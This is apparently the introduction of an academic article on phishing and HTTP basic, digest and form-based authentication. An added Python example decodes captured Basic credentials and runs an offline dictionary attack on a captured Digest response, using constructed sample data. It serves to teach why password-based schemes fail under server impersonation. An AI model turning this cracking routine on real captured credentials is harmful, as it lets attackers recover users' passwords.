Introduction
Phishing attacks have become widespread. A study by the Anti-Phishing Working Group found that the number of URLs hosting password-stealing malicious code rose from 9,529 in June 2008 to 31,173 in December 2008, more than tripling in six months (Anti-Phishing Working Group, 2009). Another study estimated that phishing cost the U.S. $3.2 billion in 2007 (Hodgin, 2007). Among the victims of phishing attacks, financial institutions are hit hardest. Because of the rising online identity theft caused by phishing and the resulting concern of regulators, financial institutions are looking for better online security tools against phishing attacks (Richmond, 2005).
In a typical phishing attack, a user first receives an email instructing him to update an online account (such as an online banking account or an online utility bill account) through an embedded URL. The email also warns that failing to comply will result in the account being locked or deleted. Panicked, the user may immediately click on the link, which leads his web browser to a web site that bears the right logo and a familiar appearance. The user then hastens to type in his account name and password. But that web site is run by an attacker, who now has the information needed to perform fraudulent transactions in the user's name. In short, a phishing attack harvests the secret used for client-side authentication by impersonating the web server.
Most of today's web applications use one of three methods to authenticate a client: basic authentication, digest authentication, and form-based authentication. (There is a fourth client authentication method on the web, certificate-based client authentication. In this method, a client is assigned a private key, which is used in the Secure Sockets Layer (SSL) protocol to authenticate the client. This method is not common for home users, as it requires the user to manage a random private key, and ordinary users lack the expertise to handle a private key correctly.) All three methods are password-based: the client remembers a password and the server stores related password verification data (PVD). In basic authentication, the client's password is encoded with Base64 (Josefsson, 2003), a public encoding that provides no confidentiality, and sent to the server for verification. In digest authentication, the client's password is not sent to the server; rather, the server sends a random challenge to the client, who responds with a value calculated from its password and the challenge. The server compares the received response with a value calculated from the challenge and the corresponding PVD (in HTTP Digest this PVD is the hash of the user name, the realm and the password, so the server never needs the cleartext password). In form-based authentication, the client's password is placed in an HTML form field and transmitted over HTTP to the server, typically in the body of a POST request.
Should the web server be impersonated, then under basic authentication and form-based authentication the phony web server receives the client's password directly. If digest authentication is used, the phony web server does not obtain the password itself, but the (challenge, response) pair it collects is enough to mount an off-line dictionary attack: a response is calculated from a guessed password and the challenge and compared against the received response, and the process is repeated until a match is found, indicating that the current guess is the correct password. Because the guessing happens entirely on the attacker's own hardware, it is not slowed by any lockout or rate-limiting policy at the legitimate server.
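The following is an added example, not code from the original article, that makes the two preceding paragraphs concrete. It shows what an impersonating server learns under each password-based method: for basic authentication it simply Base64-decodes the Authorization header, and for digest authentication it re-computes the RFC 2617 response (MD5 variant without qop) for each candidate password until one matches the captured response. The user name, realm, nonce, URI and wordlist are constructed sample data.

```python
"""Added example: what a phishing (impersonating) web server learns under
HTTP basic and digest authentication. Digest arithmetic follows RFC 2617
(MD5, no qop). All sample values below are constructed, not real data."""
import base64
import hashlib
import re


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# --- Basic authentication -------------------------------------------------
def encode_basic(user: str, password: str) -> str:
    """Build the Authorization header a browser sends for basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def decode_basic(header: str) -> tuple:
    """What the phony server does with a basic-auth header: Base64 is an
    encoding, not encryption, so the password falls out directly."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


# --- Digest authentication (RFC 2617, MD5, no qop) ------------------------
def digest_pvd(user: str, realm: str, password: str) -> str:
    """HA1 = MD5(user:realm:password): the PVD a legitimate server stores."""
    return md5_hex(f"{user}:{realm}:{password}")


def digest_response(pvd: str, nonce: str, method: str, uri: str) -> str:
    """Client response = MD5(HA1 : nonce : MD5(method : uri))."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{pvd}:{nonce}:{ha2}")


def client_digest_header(user, realm, password, nonce, method, uri):
    """The Authorization header the victim's browser sends in reply to the
    challenge (nonce) chosen by the phony server."""
    resp = digest_response(digest_pvd(user, realm, password), nonce, method, uri)
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}"')


def parse_digest_header(header: str) -> dict:
    """Extract the quoted key="value" pairs from a Digest Authorization header."""
    return dict(re.findall(r'(\w+)="([^"]*)"', header))


def offline_dictionary_attack(header: str, method: str, wordlist):
    """The phony server holds (nonce, response). It recomputes the response for
    each candidate password and stops at the first match; returns None if the
    password is not in the wordlist. Nothing here contacts the real server."""
    f = parse_digest_header(header)
    for guess in wordlist:
        candidate = digest_response(digest_pvd(f["username"], f["realm"], guess),
                                    f["nonce"], method, f["uri"])
        if candidate == f["response"]:
            return guess
    return None


if __name__ == "__main__":
    # Constructed sample exchange: victim "alice" at realm "bank.example".
    print(decode_basic(encode_basic("alice", "s3cret")))
    hdr = client_digest_header("alice", "bank.example", "sunshine",
                               "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET", "/account")
    print(offline_dictionary_attack(hdr, "GET", ["123456", "password", "sunshine"]))
```

The point of the digest half is that the attacker never needs the real server's PVD: it chose the nonce itself and received the response, so every guess is checked locally with two MD5 computations, at whatever rate the attacker's hardware allows.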